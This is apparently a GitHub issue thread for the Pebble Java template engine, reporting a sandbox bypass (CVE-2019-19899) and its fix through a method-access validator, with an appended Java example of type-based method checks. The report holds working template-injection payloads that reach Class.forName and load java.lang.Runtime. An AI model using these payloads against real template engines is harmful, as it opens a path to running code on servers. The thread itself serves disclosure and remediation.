Unsafe Methods Bypass #493

Closed
ismai1337 opened this issue Dec 18, 2019 · 2 comments · Fixed by #511

ismai1337 commented Dec 18, 2019

I was reading about https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/ and found a bypass to the fix in 454.

The following code will throw a security exception after the fix in 454:

{{(1).TYPE.getClass()}}

However, you can still access getClass via the public static java.lang.Class java.lang.Class.forName(java.lang.Module,java.lang.String) signature:

{%set daInt = (1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.getModule %}

{{(1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.forName(daInt,'java.lang.Runtime') }}

Result:
class java.lang.Runtime

@NicoleG25

Is there any plan to address this vulnerability?
Note that it appears that CVE-2019-19899 was assigned to this issue.

michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue Jan 22, 2020
@michalstodolny

Please review the pull request: #494
It forbids any access to methods of the Runtime or Class classes when allowUnsafeMethods is false.

michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue Jan 24, 2020
ebussieres pushed a commit to michalstodolny/pebble that referenced this issue May 9, 2020
@ebussieres ebussieres linked a pull request May 9, 2020 that will close this issue
ebussieres added a commit that referenced this issue May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 18, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 21, 2020
#511)

* replace allowUnsafeMethod with a Method Access validator interface. Provide a NoOp method access and a default one (#493)

* Increase performance

* Add possibility to define a MethodAccessValidator bean for spring-boot app

* Remove possibility to turn sandbox off via template
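
An added example, not code from this issue or from Pebble: it contrasts a method-name denylist with a check on the method's declaring class and return type, using the methods named in the report. The class `MethodAccessDemo`, both helper methods and the exact shape of the name-only check are assumptions made for illustration; the type list holds only the two classes named in the thread.

```java
import java.lang.reflect.Method;
import java.util.List;
import java.util.Set;

public class MethodAccessDemo {

    // Assumed shape of a name-only denylist (hypothetical, not Pebble's code):
    // it rejects getClass() but knows nothing about the type being called.
    static final Set<String> DENIED_NAMES = Set.of("getClass", "wait", "notify", "notifyAll");

    static boolean nameCheckAllows(Method m) {
        return !DENIED_NAMES.contains(m.getName());
    }

    // Type-based check: reject a method when its declaring class or its
    // return type is one of the sensitive types (or a subclass of one).
    static final List<Class<?>> DENIED_TYPES = List.of(Class.class, Runtime.class);

    static boolean typeCheckAllows(Method m) {
        for (Class<?> denied : DENIED_TYPES) {
            if (denied.isAssignableFrom(m.getDeclaringClass())
                    || denied.isAssignableFrom(m.getReturnType())) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) throws NoSuchMethodException {
        // Constructed sample: the methods the issue names, plus a harmless one.
        List<Method> samples = List.of(
                Object.class.getMethod("getClass"),
                Class.class.getMethod("getModule"),
                Class.class.getMethod("forName", Module.class, String.class),
                String.class.getMethod("length"));
        for (Method m : samples) {
            System.out.printf("%-20s name-check=%-5b type-check=%b%n",
                    m.getDeclaringClass().getSimpleName() + "." + m.getName(),
                    nameCheckAllows(m), typeCheckAllows(m));
        }
    }
}
```

The name check passes `Class.getModule` and `Class.forName`, while the type check rejects every method declared on or returning `Class` and still permits `String.length`. A denylist of types is only as complete as its list, so an allowlist of permitted classes is the stricter design.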